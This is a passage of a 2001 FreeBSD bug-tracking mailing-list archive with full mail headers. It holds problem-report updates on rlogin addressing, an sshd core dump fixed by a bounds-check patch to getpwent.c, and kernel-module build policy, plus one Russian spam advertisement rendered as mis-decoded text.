owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: My sound card Aureal with chip 8830 ( vortex 2 ) no work State-Changed-From-To: open->closed State-Changed-By: greid State-Changed-When: Thu Jun 7 10:08:54 PDT 2001 State-Changed-Why: Submitter needs to install ports/audio/aureal-kmod. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27934 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 10:50:18 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3652337B407 for ; Thu, 7 Jun 2001 10:50:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57Ho1i96754; Thu, 7 Jun 2001 10:50:01 -0700 (PDT) (envelope-from gnats) Received: from mail11.disney.com (mail11.disney.com [208.246.35.55]) by hub.freebsd.org (Postfix) with ESMTP id 2BD4437B407 for ; Thu, 7 Jun 2001 10:43:34 -0700 (PDT) (envelope-from Jim.Pirzyk@disney.com) Received: from pain.corp.disney.com (pain.corp.disney.com [153.7.231.100]) by mail11.disney.com (Switch-2.0.1/Switch-2.0.1) with SMTP id f57I67t24962 for ; Thu, 7 Jun 2001 11:06:07 -0700 (PDT) Received: from [172.30.50.86] by pain.corp.disney.com with ESMTP for FreeBSD-gnats-submit@freebsd.org; Thu, 7 Jun 2001 10:42:53 -0700 Received: from plio.fan.fa.disney.com (plio.fan.fa.disney.com [153.7.118.2]) by louie.fa.disney.com (8.9.2/8.9.2) with ESMTP id KAA12052 for ; Thu, 7 Jun 2001 10:42:02 -0700 (PDT) (envelope-from Jim.Pirzyk@fa.disney.com) Received: from snoopy.fan.fa.disney.com (snoopy.fan.fa.disney.com [153.7.117.170]) by plio.fan.fa.disney.com (8.9.2/8.9.2) with ESMTP id KAA14633 for ; Thu, 7 Jun 2001 10:42:01 -0700 (PDT) (envelope-from Jim.Pirzyk@mailhost) Received: (from Jim.Pirzyk@localhost) by snoopy.fan.fa.disney.com (8.11.3/8.11.3) id f57Hg1D18663; Thu, 7 Jun 2001 10:42:01 -0700 (PDT) (envelope-from Jim.Pirzyk) Message-Id: <200106071742.f57Hg1D18663@snoopy.fan.fa.disney.com> Date: Thu, 7 Jun 2001 10:42:01 -0700 (PDT) From: Jim.Pirzyk@disney.com Reply-To: Jim.Pirzyk@disney.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.113 Subject: bin/27939: rlogin uses wrong IP address for remote host. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27939 >Category: bin >Synopsis: rlogin uses wrong IP address for remote host >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Jun 07 10:50:00 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Jim Pirzk >Release: FreeBSD 4.3-RELEASE i386 >Organization: >Environment: System: FreeBSD snoopy 4.3-RELEASE FreeBSD 4.3-RELEASE #6: Tue May 29 10:01:46 PDT 2001 root@snoopy:/auto/roy/dist/pub/FreeBSD/4.3-RELEASE/sys/compile/UP_WORKSTATION i386 >Description: We have two hosts that are both multi homed. Snoopy and quasar. Snoopy is a FreeBSD 4.3-RELEASE system and quasar is a Sun Solaris 8 system. Snoopy has IPs 172.30.228.110, 153.7.117.170, quasar has 172.30.28.114, 153.7.117.112 /etc/resolv.conf looks like this: search fan.fa.disney.com fas.fa.disney.com fa.disney.com faf.fa.disney.com fap.fa.disney.com dqimages.com sortlist 153.7.112.0/255.255.248.0 172.30.224.0/255.255.248.0 172.30.0.0/255.255.128.0 157.23.0.0 nameserver 172.30.224.2 nameserver 172.30.224.6 nameserver 172.30.50.1 So we want to use the 153.7 subnet to communicate between the two machines (since 153.7 is atm, the 172.30.228 subnet is 100Mb enet and the 172.30.28 subnet is 10Mb enet). Snoopy's routing has this: Jim.Pirzyk@snoopy:~ 72>netstat -rn Routing tables Internet: Destination Gateway Flags Refs Use Netif Expire default 172.30.231.254 UGSc 3 180 xl0 127.0.0.1 127.0.0.1 UH 5 28634 lo0 153.7.112/21 153.7.117.170 Uc 10 9 fa0 172.30.224/21 link#1 UC 0 0 xl0 => quasar's has this: Jim.Pirzyk@quasar:~ 1>netstat -rnnetstat -rn Routing Table: IPv4 Destination Gateway Flags Ref Use Interface -------------------- -------------------- ----- ----- ------ --------- 172.30.28.0 172.30.28.114 U 1 7 hme0 153.7.112.0 153.7.117.112 U 1 22 fa0 224.0.0.0 172.30.28.114 U 1 0 hme0 default 172.30.28.254 UG 1 6 127.0.0.1 127.0.0.1 UH 16 3653 lo0 But when rlogin'g to quasar from snoopy, it uses the 172.30 subnets, ignoring the sortlist in the /etc/resolv.conf file. This is because the DNS server is sending out the 172.30 subnets first, but we have a subnet in common that should be used. Ping does work correctly though and uses the 153.7 subnet: Jim.Pirzyk@snoopy:~ 74>ping quasar PING quasar.fan.fa.disney.com (153.7.117.112): 56 data bytes 64 bytes from 153.7.117.112: icmp_seq=0 ttl=255 time=0.288 ms >How-To-Repeat: have a site similar to above and then do this rsh quasar netstat | grep snoopy # to get port number netstat -n | grep # check to see which subnet is being used. >Fix: use gethostsbyname2 instead of getaddrinfo in rcmd_af. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 14:44:48 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from fort.comstar.ru (fort.comstar.ru [195.210.128.13]) by hub.freebsd.org (Postfix) with SMTP id 3013F37B401 for ; Thu, 7 Jun 2001 14:44:40 -0700 (PDT) (envelope-from eurostroy1@yahoo.com) Received: (qmail 29340 invoked from network); 7 Jun 2001 21:44:32 -0000 Received: from d239.p9.col.ru (HELO hfdth) (212.248.7.239) by mx.comail.ru with SMTP; 7 Jun 2001 21:44:32 -0000 From: Åâðîñòðîé To: freebsd-bugs@freebsd.org Subject: Ïðåäëîæåíèå ïî ÎÒÎÏÈÒÅËÜÍÎÌÓ è ÁÀÑÑÅÉÍÎÌÓ ÎÁÎÐÓÄÎÂÀÍÈÞ äëÿ ÷àñòíîãî è îáùåñòâåííîãî ñåêòîðà. X-Mailer: Mail Bomber Reply-To: eurostroy1@yahoo.com Date: Fri, 8 Jun 2001 01:44:46 +0300 Mime-Version: 1.0 Content-Type: text/plain; charset=Windows-1251 Message-Id: <20010607214440.3013F37B401@hub.freebsd.org> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Óâàæàåìûå äàìû è ãîñïîäà. Ôèðìà "Åâðîñòðîé", âîñåìü ëåò óñïåøíî ðàáîòàåò íà ðîññèéñêîì ðûíêå, ãîòîâà ïðåäëîæèòü Âàøåìó âíèìàíèþ ïîëíûé êîìïëåêñ óñëóã â îáëàñòè ÏÎÑÒÀÂÊÈ, ÓÑÒÀÍÎÂÊÈ ÎÒÎÏÈÒÅËÜÍÎÃÎ ÎÁÎÐÓÄÎÂÀÍÈß äëÿ Âàøåãî êîòòåäæà òàêèõ èçâåñòíûõ åâðîïåéñêèõ ôèðì ïðîèçâîäèòåëåé êàê: VIESSMANN, WOLF ( ÊÎÒËÛ, ÁÎÉËÅÐÛ èç Ãåðìàíèè), ÐÀÄÈÀÒÎÐÛ KERMI (Ãåðìàíèÿ), SIRA (Èòàëèÿ), ïîëèýòèëåíîâûå òðóáû äëÿ îòîïëåíèÿ è âîäîñíàáæåíèÿ REHAU (Ãåðìàíèÿ), à òàêæå çàêàçàòü ïðîåêòèðîâàíèå è ìîíòàæ ñèñòåì îòîïëåíèÿ, âîäîñíàáæåíèÿ è êàíàëèçàöèè. À òàêæå ó íàñ Âû ñìîæåòå ïðèîáðåñòè îáîðóäîâàíèå äëÿ ÁÀÑÑÅÉÍΠïðåäëàãàåì îáîðóäîâàíèå âåäóùèõ ôèðì ïðîèçâîäèòåëåé DINOTEC, FUTURPOOL, KRULLAND (Ãåðìàíèÿ), PAHLEN (Øâåöèÿ), HAYWARD (Áåëüãèÿ), ASTRAL (Èñïàíèÿ). Íàøè öåíû íå øîêèðóþò. Òåì íå ìåíåå, ìû ãîòîâû ïðåäîñòàâèòü ñòðîèòåëüíûì, ïðîåêòíî-äèçàéíåðñêèì, àðõèòåêòóðíûì ôèðìàì è êîìïàíèÿì, ðàçìåð ñêèäîê íà ÷àñòíûå çàêàçû îïðåäåëÿåòñÿ èíäèâèäóàëüíî. Ìû òàêæå çàèòåðåñîâàíû â ðàçâèòèå äèëåðñêèõ îòíîøåíèé. Ìû âñåãäà ãîòîâû ê ðàçóìíîìó äèàëîãó. Èíôîðìàöèÿ î íàñ è î íàøåé ïðîäóêöèè Âû ìîæåòå ïîëó÷èòü íà íàøåì ñàéòå: www.eurostroy.ru , à òàêæå â íàøåì îôèñå ïî àäðåñó: ã. Ìîñêâà, óë. Âàâèëîâà, äîì. 65-à, 1 ýòàæ, îôèñ ¹8. Òåë/ôàêñ: 719-0384; òåë. 125-6859. Èëè íà âûñòàâêå "Ðîññòðîéýêñïî", Ôðóíçåíñêàÿ íàáåðåæíàÿ - 30, ïàâèëüîí ¹4. Ñ óâàæåíèåì, êîììåð÷åñêèé äèðåêòîð ÎÎÎ "Åâðîñòðîé" Ã. Áîðèñåíêî To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 15: 0:13 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7E09A37B407 for ; Thu, 7 Jun 2001 15:00:04 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57M04L39467; Thu, 7 Jun 2001 15:00:04 -0700 (PDT) (envelope-from gnats) Date: Thu, 7 Jun 2001 15:00:04 -0700 (PDT) Message-Id: <200106072200.f57M04L39467@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: David Malone Subject: Re: bin/27860: sshd caught signal 10 Reply-To: David Malone Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/27860; it has been noted by GNATS. From: David Malone To: Yoshihiro Koya Cc: FreeBSD-gnats-submit@freebsd.org, nectar@freebsd.org Subject: Re: bin/27860: sshd caught signal 10 Date: Thu, 7 Jun 2001 22:58:19 +0100 On Mon, Jun 04, 2001 at 05:30:53AM +0900, Yoshihiro Koya wrote: > >Description: > Too long user name causes sshd to dump core. > I tried to make patch. But, I couldn't do it. I've found the problem - it looks like a reintroduction of a bug in getpwent.c. It was originally fixed in versions 1.47 and 1.48 but the bug was brought back in again with the nsswitch stuff. I'm testing the patch below which seems to fix the problem. If someone can review it for me I'll commit it tomorrow. Note - MAXLOGNAME includes space for the trailing \0, which the key doesn't seem to include - hence the comparison with MAXLOGNAME-1. I've tested it with a 16 character username and things seem to work as expected. David. Index: src/lib/libc/gen/getpwent.c =================================================================== RCS file: /cvs/FreeBSD-CVS/src/lib/libc/gen/getpwent.c,v retrieving revision 1.59 diff -u -r1.59 getpwent.c --- src/lib/libc/gen/getpwent.c 2001/01/24 12:59:22 1.59 +++ src/lib/libc/gen/getpwent.c 2001/06/07 21:30:34 @@ -386,7 +386,9 @@ case _PW_KEYBYNAME: name = va_arg(ap, const char *); len = strlen(name); - memmove(bf + 1, name, (size_t)MIN(len, MAXLOGNAME)); + if (len > MAXLOGNAME - 1) + return NS_NOTFOUND; + memmove(bf + 1, name, len); key.size = len + 1; break; case _PW_KEYBYUID: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 15: 0:57 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9508537B403; Thu, 7 Jun 2001 15:00:55 -0700 (PDT) (envelope-from dwmalone@FreeBSD.org) Received: (from dwmalone@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57M0tm39589; Thu, 7 Jun 2001 15:00:55 -0700 (PDT) (envelope-from dwmalone) Date: Thu, 7 Jun 2001 15:00:55 -0700 (PDT) From: Message-Id: <200106072200.f57M0tm39589@freefall.freebsd.org> To: dwmalone@FreeBSD.org, freebsd-bugs@FreeBSD.org, dwmalone@FreeBSD.org Subject: Re: bin/27860: sshd dumps core Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: sshd dumps core Responsible-Changed-From-To: freebsd-bugs->dwmalone Responsible-Changed-By: dwmalone Responsible-Changed-When: Thu Jun 7 15:00:30 PDT 2001 Responsible-Changed-Why: I think I've figured this one out. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27860 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 18:28:34 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4E6E437B401; Thu, 7 Jun 2001 18:28:32 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f581SWR68831; Thu, 7 Jun 2001 18:28:32 -0700 (PDT) (envelope-from dd) Date: Thu, 7 Jun 2001 18:28:32 -0700 (PDT) From: Message-Id: <200106080128.f581SWR68831@freefall.freebsd.org> To: dd@FreeBSD.org, freebsd-bugs@FreeBSD.org, sobomax@FreeBSD.org Subject: Re: bin/23710: [PATCH] there is no termcap(3) manpage per se Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: [PATCH] there is no termcap(3) manpage per se Responsible-Changed-From-To: freebsd-bugs->sobomax Responsible-Changed-By: dd Responsible-Changed-When: Thu Jun 7 18:28:14 PDT 2001 Responsible-Changed-Why: Maxim just made the requested MLINK, so he can decide what to do with this. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=23710 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 18:46:44 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from assaris.sics.se (dhcp114.iss.kth.se [130.237.7.114]) by hub.freebsd.org (Postfix) with ESMTP id B4B3E37B403; Thu, 7 Jun 2001 18:46:40 -0700 (PDT) (envelope-from assar@assaris.sics.se) Received: (from assar@localhost) by assaris.sics.se (8.9.3/8.9.3) id DAA60937; Fri, 8 Jun 2001 03:46:43 +0200 (CEST) (envelope-from assar) From: assar@stacken.kth.se To: phk@FreeBSD.org Cc: freebsd-bugs@FreeBSD.org Subject: Re: kern/17613: impossible to build FS KLD without kernel source References: <200106062039.f56KdPi82298@freefall.freebsd.org> Date: 08 Jun 2001 03:46:43 +0200 In-Reply-To: phk@FreeBSD.org's message of "Wed, 6 Jun 2001 13:39:25 -0700 (PDT)" Message-ID: <5ly9r3d9q4.fsf@assaris.sics.se> Lines: 12 User-Agent: Gnus/5.070098 (Pterodactyl Gnus v0.98) Emacs/20.6 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org phk@FreeBSD.org writes: > Synopsis: impossible to build FS KLD without kernel source > > State-Changed-From-To: open->closed > State-Changed-By: phk > State-Changed-When: Wed Jun 6 13:39:10 PDT 2001 > State-Changed-Why: > It is belived that this is not the direction we want to take. Which is then the direction that we want to take? /assar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 19: 7:40 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.aist.go.jp (mx1.aist.go.jp [150.29.246.133]) by hub.freebsd.org (Postfix) with ESMTP id 5756B37B401; Thu, 7 Jun 2001 19:07:37 -0700 (PDT) (envelope-from akr@m17n.org) Received: from rpsmtp1.aist.go.jp by mx1.aist.go.jp with ESMTP id f5827V519199; Fri, 8 Jun 2001 11:07:31 +0900 (JST) env-from (akr@m17n.org) Received: from eccu1-1.etl.go.jp by rpsmtp1.aist.go.jp with ESMTP id f5827VQ24098; Fri, 8 Jun 2001 11:07:31 +0900 (JST) env-from (akr@m17n.org) Received: from flux.etl.go.jp (dhcpea003 [150.29.203.193]) by eccu1-1.etl.go.jp (8.11.4/8.11.4) with ESMTP id f5827U123189; Fri, 8 Jun 2001 11:07:30 +0900 (JST) Received: by flux.etl.go.jp (Postfix, from userid 23483) id C1049728; Fri, 8 Jun 2001 11:07:29 +0900 (JST) To: wollman@FreeBSD.org Cc: freebsd-bugs@FreeBSD.org Subject: Re: bin/27630: mktime failure. References: <200106052049.f55KnIX35198@freefall.freebsd.org> MIME-Version: 1.0 (generated by SEMI 1.14.0 - "Iburihashi") Content-Type: text/plain; charset=US-ASCII From: Tanaka Akira Date: 08 Jun 2001 11:07:28 +0900 In-Reply-To: <200106052049.f55KnIX35198@freefall.freebsd.org> (wollman@FreeBSD.org's message of "Tue, 5 Jun 2001 13:49:18 -0700 (PDT)") Message-ID: Lines: 13 User-Agent: T-gnus/6.14.5 (based on Gnus v5.8.7) (revision 08) SEMI/1.14.0 (Iburihashi) Deisui/1.14.0 (Kikuhime) APEL/10.2 Emacs/21.0.103 (i386-unknown-freebsd4.2) MULE/5.0 (SAKAKI) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In article <200106052049.f55KnIX35198@freefall.freebsd.org>, wollman@FreeBSD.org writes: > A fix from the maintainer was committed to current. Does this fix resolve > your problem? Since I don't have FreeBSD-current environment, I cannot check the problem on FreeBSD-current. But I tried tzcode2001c with the patch in which is commited to current. It works fine. So I believe FreeBSD-current fix the problem. -- Tanaka Akira To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 20:18:39 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0869E37B407; Thu, 7 Jun 2001 20:18:38 -0700 (PDT) (envelope-from dd@FreeBSD.org) Received: (from dd@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f583IbK83120; Thu, 7 Jun 2001 20:18:37 -0700 (PDT) (envelope-from dd) Date: Thu, 7 Jun 2001 20:18:37 -0700 (PDT) From: Message-Id: <200106080318.f583IbK83120@freefall.freebsd.org> To: dd@FreeBSD.org, freebsd-bugs@FreeBSD.org, mikeh@FreeBSD.org Subject: Re: bin/27907: /usr/bin/mail dumps core with a Seg Fault Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: /usr/bin/mail dumps core with a Seg Fault Responsible-Changed-From-To: freebsd-bugs->mikeh Responsible-Changed-By: dd Responsible-Changed-When: Thu Jun 7 20:18:05 PDT 2001 Responsible-Changed-Why: This is fixed in -current, and I think Mike did it (since he's the only one who's touched main(1) recently). Mike, how about MFC'ing some of your fixes? http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27907 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 23:50:25 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id 5B28137B406 for ; Thu, 7 Jun 2001 23:50:19 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.3/8.11.3) with ESMTP id f586o4103513; Fri, 8 Jun 2001 08:50:04 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: assar@stacken.kth.se Cc: freebsd-bugs@FreeBSD.org Subject: Re: kern/17613: impossible to build FS KLD without kernel source In-Reply-To: Your message of "08 Jun 2001 03:46:43 +0200." <5ly9r3d9q4.fsf@assaris.sics.se> Date: Fri, 08 Jun 2001 08:50:04 +0200 Message-ID: <3511.991983004@critter> From: Poul-Henning Kamp Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In message <5ly9r3d9q4.fsf@assaris.sics.se>, assar@stacken.kth.se writes: >phk@FreeBSD.org writes: >> Synopsis: impossible to build FS KLD without kernel source >> >> State-Changed-From-To: open->closed >> State-Changed-By: phk >> State-Changed-When: Wed Jun 6 13:39:10 PDT 2001 >> State-Changed-Why: >> It is belived that this is not the direction we want to take. > >Which is then the direction that we want to take? We don't want to check in generated files. We have more than enough trouble with that as it is with the syscalls.master derived stuff. -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 1:16: 6 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from net2.dinoex.sub.org (net2.dinoex.de [212.184.201.182]) by hub.freebsd.org (Postfix) with ESMTP id 2F2A137B406; Fri, 8 Jun 2001 01:16:03 -0700 (PDT) (envelope-from dirk.meyer@dinoex.sub.org) Received: from gate.dinoex.sub.org (dinoex@localhost) by net2.dinoex.sub.org (8.11.4/8.11.3) with BSMTP id f588FBV04999; Fri, 8 Jun 2001 10:15:11 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) To: freebsd-gnats-submit@FreeBSD.org, bmilekic@FreeBSD.org, freebsd-bugs@FreeBSD.org Message-ID: From: dirk.meyer@dinoex.sub.org (Dirk Meyer) Organization: privat Subject: Re: i386/24949: mbuf memory leak in de0 driver Date: Fri, 08 Jun 2001 10:10:45 +0200 X-Mailer: Dinoex 1.77 References: <200106042159.f54Lx0m17278@freefall.freebsd.org> X-Gateway: ZCONNECT gate.dinoex.sub.org [UNIX/Connect 0.91] X-Accept-Language: de,en X-PGP-Fingerprint: 44 16 EC 0A D3 3A 4F 28 8A 8A 47 93 F1 CF 2F 12 X-Noad: Please don't send me ad's by mail. I'm bored by this type of mail. X-Copyright: (C) Copyright 1999 by Dirk Meyer -- All rights reserved. X-Note: sending SPAM is a violation of both german and US law and will at least trigger a complaint at your provider's postmaster. X-PGP-Key-Avail: mailto:pgp-public-keys@keys.de.pgp.net Subject:GET 0x331CDA5D X-ZC-VIA: 20010608000000S+2@dinoex.sub.org Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > that it is still occuring and, if it is no longer occuring, to let us know > so that we can close the PR. Test with 4.3 in progress, final information will follow in a few days. kind regards Dirk - Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 1:20: 5 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9889537B406 for ; Fri, 8 Jun 2001 01:20:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f588K2832355; Fri, 8 Jun 2001 01:20:02 -0700 (PDT) (envelope-from gnats) Date: Fri, 8 Jun 2001 01:20:02 -0700 (PDT) Message-Id: <200106080820.f588K2832355@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: dirk.meyer@dinoex.sub.org (Dirk Meyer) Subject: Re: i386/24949: mbuf memory leak in de0 driver Reply-To: dirk.meyer@dinoex.sub.org (Dirk Meyer) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR i386/24949; it has been noted by GNATS. From: dirk.meyer@dinoex.sub.org (Dirk Meyer) To: freebsd-gnats-submit@FreeBSD.org, bmilekic@FreeBSD.org, freebsd-bugs@FreeBSD.org Cc: Subject: Re: i386/24949: mbuf memory leak in de0 driver Date: Fri, 08 Jun 2001 10:10:45 +0200 > that it is still occuring and, if it is no longer occuring, to let us know > so that we can close the PR. Test with 4.3 in progress, final information will follow in a few days. kind regards Dirk - Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 1:32:28 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from assaris.sics.se (assaris.sics.se [193.10.66.234]) by hub.freebsd.org (Postfix) with ESMTP id 150AB37B403 for ; Fri, 8 Jun 2001 01:32:25 -0700 (PDT) (envelope-from assar@assaris.sics.se) Received: (from assar@localhost) by assaris.sics.se (8.9.3/8.9.3) id KAA62197; Fri, 8 Jun 2001 10:32:27 +0200 (CEST) (envelope-from assar) From: assar@stacken.kth.se To: Poul-Henning Kamp Cc: freebsd-bugs@FreeBSD.org Subject: Re: kern/17613: impossible to build FS KLD without kernel source References: <3511.991983004@critter> Date: 08 Jun 2001 10:32:26 +0200 In-Reply-To: Poul-Henning Kamp's message of "Fri, 08 Jun 2001 08:50:04 +0200" Message-ID: <5ld78f74o5.fsf@assaris.sics.se> Lines: 21 User-Agent: Gnus/5.070098 (Pterodactyl Gnus v0.98) Emacs/20.6 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Poul-Henning Kamp writes: > In message <5ly9r3d9q4.fsf@assaris.sics.se>, assar@stacken.kth.se writes: > >phk@FreeBSD.org writes: > >> Synopsis: impossible to build FS KLD without kernel source > >> > >> State-Changed-From-To: open->closed > >> State-Changed-By: phk > >> State-Changed-When: Wed Jun 6 13:39:10 PDT 2001 > >> State-Changed-Why: > >> It is belived that this is not the direction we want to take. > > > >Which is then the direction that we want to take? > > We don't want to check in generated files. We have more than enough > trouble with that as it is with the syscalls.master derived stuff. I guess I really wanted to ask if being able to build KLDs without kernel source is something we should be aiming for, and if so, what direction to take for doing that. /assar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Jun 8 1:40:52 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id 1E3FD37B403 for ; Fri, 8 Jun 2001 01:40:48 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.3/8.11.3) with ESMTP id f588ea104783; Fri, 8 Jun 2001 10:40:36 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: assar@stacken.kth.se Cc: freebsd-bugs@FreeBSD.org Subject: Re: kern/17613: impossible to build FS KLD without kernel source In-Reply-To: Your message of "08 Jun 2001 10:32:26 +0200." <5ld78f74o5.fsf@assaris.sics.se> Date: Fri, 08 Jun 2001 10:40:36 +0200 Message-ID: <4781.991989636@critter> From: Poul-Henning Kamp Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In message <5ld78f74o5.fsf@assaris.sics.se>, assar@stacken.kth.se writes: >Poul-Henning Kamp writes: >> In message <5ly9r3d9q4.fsf@assaris.sics.se>, assar@stacken.kth.se writes: >> >phk@FreeBSD.org writes: >> >> Synopsis: impossible to build FS KLD without kernel source >> >> >> >> State-Changed-From-To: open->closed >> >> State-Changed-By: phk >> >> State-Changed-When: Wed Jun 6 13:39:10 PDT 2001 >> >> State-Changed-Why: >> >> It is belived that this is not the direction we want to take. >> > >> >Which is then the 